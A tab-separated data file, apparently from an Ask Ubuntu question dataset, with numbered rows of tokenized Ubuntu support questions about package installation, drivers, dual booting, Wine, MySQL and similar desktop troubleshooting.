483916	installing tinyos on recent version of ubuntu	i am following this tutorial to install tinyos but when i run sudo apt-get install tinyos it says unable to locate package . i have tried all distributions .
483917	is there any shortcut keys to open nautilus	by ctrl+alt+t i can open terminal . so is there any keyswitch to open nautilus ? or we should define that ?
483918	editing songs ' meta-data including the album art	rhythmbox is able to edit most , but i also need to override the default/downloaded image of the album art that 's displayed when the song is played . please tell how to do so through rhythmbox ( though i doubt that can be done ) . if that 's impossible , please recommend a few music editors/taggers that can get the job done .
483923	eclipse frequent crash	i 've been using eclipse ( the one bundled in adt ) extensively for about a year and had no problems . but from yesterday , without any particular change ( no eclipse update , no new plugins , ... , edit : however , i updated firefox yesterday ) it started crashing . if crashes a few seconds after i run it . i even reset workspace , but got no success . i was using opedjdk 7 , reverted back to openjdk 6 , again with no success . here 's the console output when the crash happens : http : //pastebin.com/ft3vlkat and here 's the more detailed error log it generates : http : //pastebin.com/uyiu8wqq i 'm using ubuntu 14.04 in x86-64 architecture . adt version is v22.0.1
483927	reset zsh config ?	yesterday i installed zsh , and tried to configure some things , but somehow everything is messed up . a lot of commands do not work , i 've done prompt in ~/.zshrc but it does not work correctly either . for example i am trying to search for something : now as you can see i also do n't have prompt name even though i added prompt= '' ... . '' configuration into ~/.zshrc file . is it possible to somehow reset whole configuration ? zsh echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/mosquito/hp_fortify/hp_fortify_sca_and_apps_3.80/bin : /home/mosquito/hp_fortify/hp_fortify_sca_and_apps_3.80/bin zsh cat /etc/shells /etc/shells : valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash /bin/zsh /usr/bin/zsh
483928	login screen stuck as desktop background after sign on	the wallpaper of my desktop does n't appear and instead only the wallpaper of my login screen appears in my desktop . also though the launcher , panel everything appears ( as shown in the screen shot ) they work as well . i tweaked my settings with ubuntu-tweak and everything went haywire after that . i have even deleted ubuntu-tweak after that yet the issue persists . i 've read this article on ubuntuforums but still do n't understand . someone please explain it to me . here 's the screen shot from my desktop , http : //goo.gl/l8sqly ( sorry i ca n't post image here , because my reputation is to low )
483932	black screen when bootloading windows 7	i am new to ubuntu 14.04 . previously , i had saucy salamander and winfows 7 on my pc and all qas running well . i recently formatted my pc and after installing windows 7 i preferred to install ubuntu 14.04 . then installation process went well and ubuntu runs well . but when i try to acess windows from the bootloader , my screen turns black and i am taken back to the bootloader . no error pops up . i did researches , hadvmy grub updated to grub2 but no success so far : ( . please help me out , regards
483934	meaning of *supports network install ? * and *works `` out of the box '' *	what do supports network install ? and works `` out of the box '' mean in this page : https : //help.ubuntu.com/community/hardwaresupportcomponentswirelessnetworkcardsdlink does network install mean that it supports creating a network connection ?
483937	internet connection really slow on kubuntu 14.04 lts with wifi	i 'm having problems after installing the last version of kubuntu . also , i downgraded to 12.04.3 lts , and still had the same problem . i 've stable conection only when i 'm wired . already installed ath5k modile for the 2nd time . do n't know what to do ... 02:00.0 ethernet controller : marvell technology group ltd. 88e8039 pci-e fast ethernet controller ( rev 14 ) 03:00.0 ethernet controller : qualcomm atheros ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 )
483939	how to remove uninstalled wine app icons from unity dash ?	i had installed lan messenger ( for windows ) using wine but i found out that lan messenger is also available for linux so : i uninstalled lan messenger from wine . i also removed wine . deleted the .wine directory . after that sudo apt-get autoremove and sudo apt-get autoclean . then i installed lan messenger using dpkg -i pkgname.deb and it installed successfully . the problem is that now i get this in dash : any help is highly appreciated . [ note ] i am using ubuntu 12.10
483940	problem server dhcp	i have deleted all the file system of dhcp server from ubuntu please how to do to retrieve them ? thank you in advance for yours responses .
483941	how can i dual boot an encrypted laptop ?	i recently installed linux mint 17 and opted to encrypt my laptop . however when i attempted to dual boot ubuntu , linux mint ( obviously ) does n't show up . what options ( if any ) do i have ?
483942	samsung ml-3310nd stopped to work after updates	at the university where i work as a system administrator , we have a samsung ml-3310nd which already worked for years , but last week it stopped to work on some of our ubuntu 12.04 machines ( those with the latest updates for 12.04 ) , the windows machine and the other 12.04 machines who isnt updated yet , is still working fine . does anybody know how i can get the printer to work on all the computers again ? we use it as a network printer
483947	monitor not turning off in 14.04	i have a freshly installed ubuntu 14.04 . in settings `` brightness and locking '' i had the following settings : turn monitor off after `` 10 minutes '' locking : on monitor locking after `` 5 minutes '' and `` ticked '' ask for password ... ( sorry my system is in german , hopefully i have the right translation ) . what happens : system gets locked after 5 minutes but never turns off . i always see the login screen . i tried to switch the times ( first turn off , then login etc ... ) but always the same result . i can , however manually select standby . then the monitor switches off . but then i ca n't wake up the system anymore . no mouse or keyboard reaction ... i have the standard ubuntu graphics driver installed . no extra atm ( fglrx ) etc . here is a example screenshot of my settings . monitor does not turn off after 10 minutes . i also tried `` monitor off after 5 minutes and screenlock after 10 minutes '' . monitor does not turn off . because of 2 comments telling me `` it turns off after 10 minutes '' . well i know it 's not meant to turn off immediately . but it is not turning off after 10 minutes and not after 30 minutes and not tomorrow ; )
483948	trusty tahr in virtualbox on yoga 2 pro running very slowly	so i 've followed the steps from the following link ( and many similar ones ) : why does a ubuntu guest in virtualbox run very , very slowly ? and i have two main problems . my vm running ubuntu is running incredibly slowly on a pretty high end ultrabook . even after following the instructions on the link , running /usr/lib/nux/unity_support_test -p shows that i still do n't have unity 3d support , so i am assuming that is at least partially the problem . i have enabled virtualization in my bios , given the guest os 3 gb of ram , enabled hardware acceleration and have installed guest additions multiple times .
483949	is it possible to launch an application inside a virtual machine ?	i am currently running ubuntu 14.04 as my main os , with a windows 7 installation inside virtualbox for things i just ca n't easily do on ubuntu ( like running microsoft office ) . now i am wondering if there are ways to send commands from your host to your virtual machine to , for example , launch microsoft word . does someone know if this is even possible ? if it is , i could use it to integrate the virtual machine more closely in ubuntu by making some pretty desktop shortcuts to office for example !
483950	blinking visibility of icons in lubuntu 14.04	i not see correctly icons on panel - only when unhover mouse . problem on video : https : //www.youtube.com/watch ? v=kssxovqwwq0 i have this : but need this ( see only 1/10 of seconds - see on video ) :
483952	opening files from networks with libre office	i am able to see all files ( word/excel etc ) through dolphin/network : i am able to cut from network computers , and paste and then open in my system : however all other files like pdf/photos etc open directly without cut/copy/paste/open . i am using kubuntu 14.04 lts and libre office that was bundled . how do i solve it ? i am trying to replace a few computers with linux instead of xp etc . and i 'm stuck because of this .
483959	prevent apt-get remove from uninstalling related packages	i uninstalled some packages with apt-get remove . in addition to the selected packages the okular document viewer was removed , which was running on my computer long before the other packages . is there any way to prevent those `` side effects '' , so that i do n't have to reinstall programms again ?
483965	apt-get upgrade not fully installed but is ok , how to remove ?	we use mariadb with galera . all works well , but every time we upgrade with sudo apt-get upgrade it thinks it fails to upgrade mariadb-server , but it does work fine . i think the issue is caused because it takes a long time to start the server again as it needs to catch up with what it missed from the other servers while it was down and so the upgrade script thinks there was a problem . the issue is that now whenever i call sudo apt-get upgrade it tries ( and fails ) again . how can i manually tell it that that package is fine and to just leave it alone ? thanks . setting up mariadb-galera-server-5.5 ( 5.5.37+maria-1~saucy ) ... * stopping mariadb database server mysqld [ ok ] * starting mariadb database server mysqld [ fail ] invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing package mariadb-galera-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mariadb-galera-server : mariadb-galera-server depends on mariadb-galera-server-5.5 ( = 5.5.37+maria-1~saucy ) ; however : package mariadb-galera-server-5.5 is not configured yet . dpkg : error processing package mariadb-galera-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mariadb-galera-server-5.5 mariadb-galera-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) vioadmin @ dachshund : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] n abort .
483966	how to upload any file to google drive using ubuntu file manager	i am not getting the way to upload any file to google drive as the drive is just like a folder in ubuntu and copy paste of any file to drive does not uploads it and also i have n't seen any option to upload any file to google drive in the file menu . so in short is there any way to upload files to google drive using ubuntu file manager
483967	installing ubuntu inorder to install boot loader	i deleted my partition for ubuntu and my windows os cant load . how can i load ubuntu into a usb so i can install the boot loader on my pc ?
483973	forked-daapd wont scan	i installed forked-daapd . i changed the config file and put in the location of my music files and a password . it doesnt scan them and when i try to start the web interface , it keeps asking me for a user name and password . no matter what i type , it wo n't accept them . hmfff ! lol i 'm stuck ! i would appreciate any help .
483974	prove programs without installing ubuntu ? only running with the cd ?	i have a question , i would like to test a program in ubuntu to see if that works better in windows 7 ( `` android sdk '' ) . but i do not want to install ubuntu on the pc , and do not want to use a virtual machine . could only install programs to try booting from the cd or impossible to install programs from the cd . sorry if my english is bad .
483979	during halt system hibernates on lid closed	i use xubuntu 14.04 64bit on lenovo g510 . i disabled hibernation on lid closed in xfce power manager . on lid closed : do nothing . it works . i can close and open the lid and system is not hibernating . problem occurs when i want to halt or reboot . when i close lid too fast , computer hibernates . i can notice that , because when i open the lid after many hours , system goes back from hibernation and it is fishing halt . how can solve this ?
483983	trouble running/installing lucid player software in either ubuntu or wine	i am trying to install some plant id software on my ubuntu 14.04 install . the software is supposed to run on linux on something called lucid player via java . when i install through the terminal i get partial success , but the crucial desktop shortcut required to launch the app is not created . this is what i did ... downloaded java and plugin from the java website . ran installer from the terminal as such ... details from the terminal while installing : â simon @ simon-700z5a : ~ $ sudo su [ sudo ] password for simon : root @ simon-700z5a : /home/simon # cd /media/simon/euclid root @ simon-700z5a : /media/simon/euclid # java -jar euclid_installer.jar 05/06/2014 3:23:23 pm info : logging initialized at level 'info' 05/06/2014 3:23:23 pm info : commandline arguments : 05/06/2014 3:23:24 pm info : detected platform : ubuntu_linux , version=3.13.0-24-generic , arch=x64 , symbolicname=null , javaversion=1.7.0_55 05/06/2014 3:23:24 pm warning : resource customicons.xml not defined . no custom icons available /usr/local/euclid/euclid-1401945861931.desktop ( no such file or directory ) 05/06/2014 3:24:21 pm warning : could not copy to /root/.local/share/pixmaps ( ( no such file or directory ) ) [ writing the uninstaller data ... no shortcut was created on the desktop or in applications menu , though i requested both at setup . i can launch start.html from euclid directory through my root browser , but can not use the full software , only some html info pages . when i try to run the part of the software where lucid is required , i get this message from the software in my browser : this page has been disabled in this version of the application . to make an identification please use the lucid player key . the lucid player will launch each time you open the product , and you will see the lucid icon in your taskbar at the bottom of your screen . alternatively you can launch the lucid player by clicking on your product icon on the start menu or desktop . please note that the lucid player screen may appear behind the product 's home screen and you will need to close the home page to view the key . as i said these icons or desktop shortcuts were not created , and this text is obviously referring to a windows system . i have tried contacting the distributers of the software and they suggested using wine , which i did without success . posting this problem here is a long shot , but i thought i would in case somebody has had a similar problem with either java or lucid player or wine .
483984	how to configure an app to run on all desktop automatically	i 'm running kubuntu 14.04 and i 'd like to have some apps to automatically be launched on all desktops and not only the current one . as an example , i work on a dual screen and usually i have a konsole open on my second screen , taking either the full screen , or half , or a quarter depending on what i 'm doing . but almost always i want this konsole to appear on all my four virtual desktops . another example would be the new google hangout for chrome plugin with the latest chrome ( 35.0 ) conversations are bound to the desktop you open them on , i constantly have to right click â move to desktop â all desktops . is there a way to configure such apps to always run on all desktops ? it seems that in the settings i could use the window behavior ( personal translation , it may be called differently ) panel to ensure that some app behave in a particular manner . it could work for the konsole example as the name of the window is consistently * - konsole but for the hangout one the window name is the person 's full name . any idea for this one ?
483988	add second disk to encrypted laptop	i have installed cleanly 14.04 amd64 onto my laptop which has two ( ssd ) disks . i used the default install with full disk encryption option on the first disk . however i 'd now like to add a second disk to the machine , and i 'd like that also to be encrypted in the same way . i 'd like the second disk to either be added to the space the first disk as , so it 's all just seen as one volume . if that 's not possible then having the second disk as /home ( and also fully encrypted ) is fine too . note : i 'm not using ecryptfs . how can i easily add the second disk to the full disk encryption setup ?
483989	wine : using webcam with cisco jabber video client	i 'm trying to use cisco jabber video client ( https : //www.ciscojabbervideo.com/home ) with wine but i 'm unable to get the webcam to work . steps that i have completed this far : register an account for cisco jabber video ( required to get the download link for the application ) . install cisco jabber video client . run cisco jabber video client . this part was problematic until i found out that this application expects to find a copy of ksuser.dll int the system . i located a copy of said dll from the dlldump.com and put it in ~/.wine/drive_c/windows/system32 and everything else but video from webcam seems to work . i 'm able to successfully use the webcam without wine . the webcam already works with skype , cheese webcam viewer , guvcview , luvcview and flash plugin ( both firefox and google chrome ) . still the cisco jabber video client running on wine claims that i have no usb webcam installed in the system . i also tried to add devenum override and deleted hkey_current_user/software/microsoft/activemovie with regedit as suggested by http : //wiki.winehq.org/msn_messenger_webcam_support can you suggest anything else to get the camera to work ? ( the reason i even need this stuff is i would need to connect to cisco telepresence sx20 hardware on the remote site and it seems that ekiga is not compatible with that . ekiga is never able to establish a connection with that thing . ) update : i forgot to mention the hardware i 'm using : bus 003 device 064 : id 045e:075d microsoft corp. lifecam cinema software : ubuntu 12.04.4 lts 64-bit ( precise with all the updates ) wine 1.7.18-0ubuntu1 from ubuntu-wine ppa
483991	should i install 32 or 64 bit ubuntu ?	i was unsure so i had to ask . sorry if this is duplicate . i do n't know if the system i am running is 32 or 64 bit . it has 2gb of ram , which is apparently an indicator that it is 64bit , and it is win8.1 , which i 've heard only comes in 64bit . however , dxdiag tells me that i am running a 32 bit os . i 'd be happy to supply more info as you require , and thanks in advance .
483992	where do i put database and sub-database files in mysql ? my mysqld.sock is missing , and some phpmyadmin login problems	i used to run wamp in my old computer . i have gotten into linux and i wanted to take my website from my old computer and put it here and run it with apache2 , mysql , and phpmyadmin . i have decided not to use phpmyadmin , because there was login problems . i got this error : connection for controluser as defined in your configuration failed . and i also got ( # 2002 ) can not log in to the mysql server and when i do sudo service mysql start i get some problems ... so i have decided to take my database and sub-database ( like the information and stuff ) files and put it into the correct mysql folder . i am a huge noob with this so please go easy on me . i am also missing my mysqld.sock file ... and it ca n't be created because i ca n't start mysql ... i am having so much trouble with this . in my cofig.inc.php ... i have n't edited it much . maybe i can recreate the database if phpmyadmin will work . that does n't work , i ca n't do it manually with the sudo commands , and i do n't know where to put the database files . and i 'm pretty sure even if i put it in , i wo n't be able to execute it because mysql wo n't run . help
483993	netshare error 255 . permission denied	i have a 2 part question . 1 . when i tried to share a folder on my server 12.4 gui loged in as a admin whom has sudoers permision as well . i get netshare 255 error . permission denied ... . 2 . i have shared a secondary hdd as media/hdd2/ & created & shared a folder named as miracle . i create the folder using webmin interface which is quite easy . anyway now i need to create another folder say iso file , but once i created it again using webmin , the new folder already contents the files which is in the miracle folder . so basically i want a blank folder which should be in /media/hdd2 ( hdd2 been the secondary hdd ) i am sure i am doing it wrong hence if you can point it in the right path that would be great thanks a bunch-cheers
483996	nvidia-prime : missing glx or opengl : ubuntu 14.04 amd64	ubuntu 14.04 64 bits in a laptop with a discrete gt 630m graphic card ( i5-2450m ) whenever i run a program with wine using the gt 630m ( nvidia xserver/nvidia-prime/ driver : 331.38 ) i get this as error : libgl error : failed to load driver : swrast err : winediag : x11drv_winegl_initopenglinfo direct rendering is disabled , most likely your 32-bit opengl drivers have n't been installed correctly ( using gl renderer `` geforce gt 630m/pcie/sse2 '' , version `` 1.4 ( 2.1.2 nvidia 331.38 ) '' ) . fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x1a5e228,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x1a5dfc8,0x00000000 ) , stub ! x error of failed request : glxunsupportedprivaterequest major opcode of failed request : 155 ( glx ) minor opcode of failed request : 16 ( x_glxvendorprivate ) serial number of failed request : 1372 current serial number in output stream : 1373 programs run perfectly ( as expected ) using mesa : intel sandybridge series . how can i fix this ? ? thanks in advance
483997	white text on some system windows	i get white text on most windows , ( it switches to its regular color when the said window loses focus ) . i 'm using a windows dual boot xubuntu 12.04 with xfce , xfwm , and a gtk theme 'zukiwi ' . can someone please help me sort this out ? screenshots of the issue : the problem is common with most windows that relate to some kind of system / core task . also , here is the gtkrc-2.0 file that i 'm using : # desktop icon transparency tweak style `` xfdesktop-icon-view '' { xfdesktopiconview : :label-alpha = 0 base [ normal ] = `` # 000000 '' base [ selected ] = `` # 0071ff '' base [ active ] = `` # 0071ff '' fg [ normal ] = `` # eeeeee '' fg [ selected ] = `` # 3a3a3a '' fg [ active ] = `` # 3a3a3a '' text [ normal ] = `` # 262626 '' xfdesktopiconview : :cell-spacing = 0 xfdesktopiconview : :cell-padding = 0 xfdesktopiconview : :cell-text-width-proportion = 2.0 } # widget_class `` *xfdesktopiconview* '' style `` xfdesktop-icon-view '' # fixes the panel color to a dull grey # style `` panel '' # { # font_name = `` segoe ui regular 8 '' # bg [ normal ] = `` # 222222 '' # fg [ normal ] = `` # 323232 '' # } # # widget_class `` *panel* '' style `` panel '' # widget `` *panel* '' style `` panel '' # class `` *panel* '' style `` panel ''
483999	ultrastar deluxe do n't start on ubuntu 14.04	i tried to install ultrastar deluxe for karaoke on my ubuntu 14.04 htpc . the installation was okay but when try to start the game via advance launcher the system freez . i checked the error-log of ultrastar deluxe and found the following massage : ultrastar deluxe v 1.1.0 build error log date : 14-6-14 time : 00:34:18 error : libavformat header ( 54.20.4 ) and dll ( 54.20.3 ) versions do not match . error : initialize failed , removing - sdl_playback when i tried to start via console i received the following errors xbmc @ mediacenter : /usr/games $ ./ultrastardx an unhandled exception occurred at $ 000000000044822e : eaccessviolation : access violation $ 000000000044822e $ 00000000004d71dc $ 00000000004c9ea6 $ 000000000047250b xbmc @ mediacenter : /usr/games $ sudo ./ultrastardx home directory not accessible : keine berechtigung alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dsnoop.c:618 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib pcm_dsnoop.c:618 : ( snd_pcm_dsnoop_open ) unable to open slave alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave can not connect to server socket err = datei oder verzeichnis nicht gefunden can not connect to server request channel jack server is not running or can not be started expression 'stream- > playback.pcm ' failed in 'src/hostapi/alsa/pa_linux_alsa.c ' , line : 4611 expression 'stream- > playback.pcm ' failed in 'src/hostapi/alsa/pa_linux_alsa.c ' , line : 4611 sdl_setvideomode failed [ initialize3d ] how can i solve this ?
484000	plymouth > how to prevent the user enter to the text-based boot description by hitting esc key	i want to keep the user in the plymouth boot theme and restrict to see the background boot process by pressing esc key while boot theme is showing
484002	i can not watch youtube full screen videos on the monitor	i have just got a new monitor to connect it to the laptop . i have opened firefox in both screens . when i make full screen mode on the monitor and want to surf the web on the laptop at the same time , the full screen mode just goes off to normal one . is there a way to watch full screen mode videos on youtube and surf the web on my laptop as well ? thank you
484003	different users with different encrypted workplace ?	when installing ubuntu there is an option to encrypt the workplace . now for one user i would have an encrypted place . thatâ´s fine , but what if i would like to add later a second user . for that user2 i also want an encrypted workplace , with a different password . i also want that these workplaces are separated - that means if somebody would get access to user1 the user2 should not have to worry about anything ( also vice versa ) . is there a way to do so ? or is there something wrong with this idea ? thank you ! edit : using ubunutu 14.04 if this is important .
484006	modify a keyboard configuration	i 'm using ubuntu 12.04 . i already have several keyboard configurations on my ubuntu , including serbian ( cyrillic ) . i would like to add another one : russian , but not the one provided by ubuntu . i would like to make my own : serbian cyrillic keyboard + russian missing letters instead of serbian letters that do n't exist in russian ( they share the same alphabet with very few differences ) . so basically , there would be a very few letters to modify , not the entire file . but i have no idea on how to do that : \ what is the syntax , etc ... it would be awesome if someone could help me with that . thanks in advance !
484007	firefox not responding while click firefox menu bar	i am using ubuntu 10.04 . unfortunately , i 've removed firefox using the command : sudo apt-get purge remove firefox after , i 've installed firefox using the command sudo apt-get install firefox* when i open firefox , the firefox window will open but i could not access any menu bar . i 've used firefox -p command and created a profile and it works but after a reboot of the machine , firefox is not functioning properly .
484008	two network interfaces use for up and down	i 've setup ubuntu server 14.04 as a virtual machine using vsphere . when i created the machine i set it up with 2 network cards . is it possible to set one as a download interface and another as upload ? we 'll be using this server as a build system , which takes a lot of data from flat csv files , then turns them into a mysql table . we run our software from this same mysql database too , so we 'd want good network performance .
484011	how do you back up your virtual machine	a quick question . i am running a windows server 2008 virtual machine on ubuntu using virtual machine manager . my question is i want to make regular back up of the virtual machine as its very important since the vm is our dc on our network . any suggestions ?
484014	get keyboard input without requiring root and without x11	i 'm trying to capture keyboard input in a c/c++ program without requiring root privileges and without the use of x11 xnextevent ( ) . i 've tried to open the device directly , but for obvious security reasons , accessing hardware directly requires root permissions . the device i 'm trying to open is `` /dev/input/by-id/ ( my keyboard name here ) '' which maps to an event pipe ( `` /dev/input/event < # > '' ) that requires root in order to read . x11 library allows me to capture keyboard events ( using xnextevent ) , but i ca n't rely on the client having x11 installed for cases in which they want to run headless and without the gui . i need to be able to capture all keyboard keys , including the shift , alt , ctrl , and windows ( or mac ) key . preferably , i 'd also like to capture media keys such as play , volume up/down , etc and only when the application has focus . does anyone know how i might be able to do this ? i 've thought of just doing two different code paths for input , one for headless in which they would pull events just using stdin ( but this wo n't catch the shift key afaik ) , and the other path uses x11 , but i 'd like to only have to maintain one keyboard input system if possible .
484015	12.04 upgrade to 12.10	i am a newbie to ubuntu and not a techie . i have been working on 12.04 for a while without any problems . after being prompted to upgrade to 12.10 , i did but to my sorrow . 1st i had everything on my desktop except the launchpad . following instructions from ask ubuntu , a lot of things happened . 12.10 seems to be installed because on the log in page left bottom corner it said 12.10.but it did not except my password . after following more instructions , i just have a blank purple screen , no place to log in my laptop is a asus n53s with a nvidia .
484021	start skype on boot with crontab	i includes these entries yet skype do n't manage to start on boot : @ reboot /usr/bin/./skype @ reboot /usr/bin/skype
484026	the system is running in low-graphics mode after bumblebee	i 've read the other topics about this problem but my problem did n't solved . i tried to install bumblebee because of hdmi problem . i gave these commands . sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia virtualgl linux-headers-generic sudo reboot then i got `` the system is running in low-graphics '' error . i tried a lots of ways but i could not solve the problem for a week . also i can not `` purge '' nvidia drivers . here are some outputs ; dpkg -l | egrep `` nvidia|bumblebee '' rc nvidia-173 ii nvidia-304 rc nvidia-331 rc nvidia-331-updates ii nvidia-common ii nvidia-current ii nvidia-persistenced ii nvidia-prime ii nvidia-settings ii nvidia-settings-304 ii nvidia-settings-331 173.14.39-0ubuntu0.0.1 304.116-0ubuntu1^xedgers^precise1 331.20-0ubuntu0.0.2 331.38-0ubuntu0.0.1 1:0.2.44.2 304.116-0ubuntu1^xedgers^precise1 331.20-0ubuntu1^xedgers^precise1 0.5^hybrid0.0.3 331.20-0ubuntu0.0.3 331.20-0ubuntu0.0.3 331.20-0ubuntu1^xedgers^precise1 nvidia binary xorg driver , kernel module annd vdpau library nvidia binary xorg driver , kernel module annd vdpau library nvidia binary xorg driver , kernel module annd vdpau library nvidia binary xorg driver , kernel module annd vdpau library findi obsolete nvidia drivers transitional package for nvidia-current load the nvidia kernel driver and create device files tools to enable nvidia 's prime tools for configuring the nvidia graphics driver transitional package for nvidia-settings tool for configuring the nvidia graphics driver sudo apt-get purge nvidia* reading package lists ... done building dependency tree reading state information ... done e : unable to locate package nvidia-bug-report.log.gz e : could n't find any package by regex 'nvidia-bug-report.log.gz' thanks . 12.04 64bit nvidia gt525m dell inspiron n5110
484027	accidentally installed the matlab launcher without the actual matlab and can not stop the installation process	i do not have matlab in my computer so the installer keeps on asking me where is matlab located and i do not know how to make it stop asking ! tried uninstalling the launcher in terminal with sudo apt-get remove matlab but i get the error unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? please help and thanks in advance .
484030	crosscompiling with libboost for arm architecture	i am using a 32 bit ubuntu system and my goal is to compile my c++ program for arm architecture ( beagleblack ) . however , my c++ program needs libboost meaning i get errors like this while compiling : /4.7/../../../../arm-linux-gnueabi/bin/ld : can not find -lboost_system -bash : /usr/lib/gcc-cross/arm-linux-gnueabi/4.7/../../../../arm-linux-gnueabi/bin/ld : : no such file or directory after reading some blogs i think that i have to compile libboost for arm by myself . question : is my assumption true ? is there really no precompiled libboost for arm that can be used with g++-arm-linux-gnueabi to compile for arm under ubuntu 32 bit ?
484031	meld not working with git on ubuntu 14.04	trying to run meld as difftool on ubuntu 14.04 prompts the following error : launch 'meld ' [ y/n ] : traceback ( most recent call last ) : file `` /usr/bin/meld '' , line 91 , in locale.setlocale ( locale.lc_all , '' ) file `` /usr/lib/python2.7/locale.py '' , line 579 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting this is a default install , no special configuration has been done .
484034	dj software recommendation	i am using virtual dj at my uncle 's house but want to use it on ubuntu 12.04 on a dell netbook . i 'm looking for a software recommendation other than mixxx and dj play . i do n't like them .
484037	wired connection loss	when i started system wired connection works fine . but after a while suddenly i experience loss of ethernet connection and able to establish the connection if and only if reboot the system . is there any way to fix the issue . thanks
484038	ca n't update and ca n't install any package - files list file for package 'libatk-adaptor ' is missing final newline	whenever i try to install any package i receive this error 0 upgraded , 1 newly installed , 0 to remove and 124 not upgraded . need to get 19.6 kb of archives . after this operation , 81.9 kb of additional disk space will be used . get:1 http : //sa.archive.ubuntu.com/ubuntu/ precise/main finger amd64 0.17-14 [ 19.6 kb ] fetched 19.6 kb in 0s ( 36.6 kb/s ) selecting previously unselected package finger . ( reading database ... 75 % dpkg : unrecoverable fatal error , aborting : files list file for package 'libatk-adaptor ' is missing final newline e : sub-process /usr/bin/dpkg returned an error code ( 2 )
484040	how to properly install another desktop on kubuntu ?	after installing unity-desktop on kubuntu has a few problems : dash does not show anything ( applications . .. ) , it is empty . when i switched back to kde then my network connection disappeared from network widget ( it shows only the connection editor ) . how to install desktops without problems ?
484042	/boot/grub/device.map is missing on ubuntu 14.04	the device map file /boot/grub/device.map is in this format : ( disk ) /dev/device so , for example , on a system with a floppy and a single scsi disk , the file would look like this : ( fd0 ) /dev/fd0 ( hd0 ) /dev/sda i try to display its content : cat /boot/grub/device.map i get this error : no such file or directory is it renamed or it is a new hierarchy of linux system
484049	more information about df	at my work , i have to delete/purge certain things on the hd to our servers . i usually check df -h afterwards to check the available space and usage . and sometimes i noticed that this does not update right away . i remember asking my colleagues about this and they mentioned why that was the case but i forgot what they advised me . does anyone know why df -h does not update right away and if there is something i would have to do to get it to update ?
484050	handbrake ripped mp4 stops at 27mins 55 sec	i am running ubuntu 14.04 lts 32 bit . i have installed handbrake from add-apt-repository ppa : stebbins/handbrake-snapshots ( thus avoiding the debian issue ) but i 've found that all of the mp4 's play the first 27 mins 55 secs ( +/- 2 seconds ) and then fail . i 've tried a number of movies and they all seem to do the same . is there something magic about 27 mins 55 seconds ? any ideas ?
484051	preserve screen backlight intensity over sleep	i am running kubuntu 14.04 on my macbook pro retina 13 '' ( macbookpro10,2 ) with integrated intel graphics , and no other graphics chips . currently , when i put my machine to sleep and later wake it up again , it resumes running with the screen backlight set to 100 % . how can i fix it so that it remembers the brightness from before sleep ? this problem occurs when i am using /sys/class/backlight/intel_backlight to control the backlight , but the backlight intensity is preserved over a sleep if i use /sys/class/backlight/acpi_video0 . ( but acpi_video0 has other problemsâplease refrain from suggesting it as a solution ) further backstory : i have two directories inside /sys/class/backlight , namely acpi_video0 and intel_backlight . kde will automatically use acpi_video0 to control the backlight because of its type ( firmware , vs raw for intel_backlight ) . when i allow this to happen , backlight intensity is indeed preserved over a sleep . however , the granularity of the backlight control is too coarse and the leap between 0 % and the first non-zero level is too great , so i would like to use intel_video instead . searching for solutions to this , i discovered that this is not intended to be configurable , even though the different controllers act very differently . to get around this , i ended up with the following ugly hack : in /etc/fstab , bind-mount intel_backlight onto acpi_video0 . this makes kde use the intel_backlight controller whether it wants to or not : ) however , it now resets the brightness to 100 % whenever it wakes up . how can i make it remember the backlight intensity over a sleep ? if you do n't have an answer , but you have any ideas as to how i could debug this at all , i would be very grateful : )
484052	bash / python error handling ?	i am trying to execute very basic python code containing error handling as a bash script , but while the code seems to run ok in python , the code generates problems when executed under bash . # ! /usr/bin/python x = input ( 'enter your number : ' ) try : x = float ( x ) print ( 'your number multiplied by 2 is : ' , x*2 ) except valueerror : print ( 'not a valid choice ' ) x == 0 this is the error report from bash : enter your number : -p traceback ( most recent call last ) : file `` cycle.py '' , line 3 , in < module > x=input ( 'enter your number : ' ) file `` < string > '' , line 1 , in < module > nameerror : name 'p ' is not defined as i understand the input error had to be handled by python first and then it would return 0 exit status to bash , but apparently this is not the case ? is my code all right ? is there a way to force python to handle the error first without evoking bash ? is there any other critical pitfalls when running python programs ( presumably correctly written ) as bash scripts ?
484054	how to boot windows automatically ?	i recently installed ubuntu ( dual boot with windows ) . i want to boot windows automatically unless i manually choose ubuntu . i use grub and startupmanager ( yes i know obsolete ) . i am running ubuntu 14.04 and windows 7 . can someone tell the procedure to do this ?
484059	do mirrors exist for restricted , multiverse and universe repos ?	as far as i know , this page on launchpad contains the de-facto list of official archive mirrors for ubuntu . but all the mirrors available there contain only main repository . so where are the restricted , multiverse and universe repos ? are they not mirrored or is the list available somewhere else or something else ?
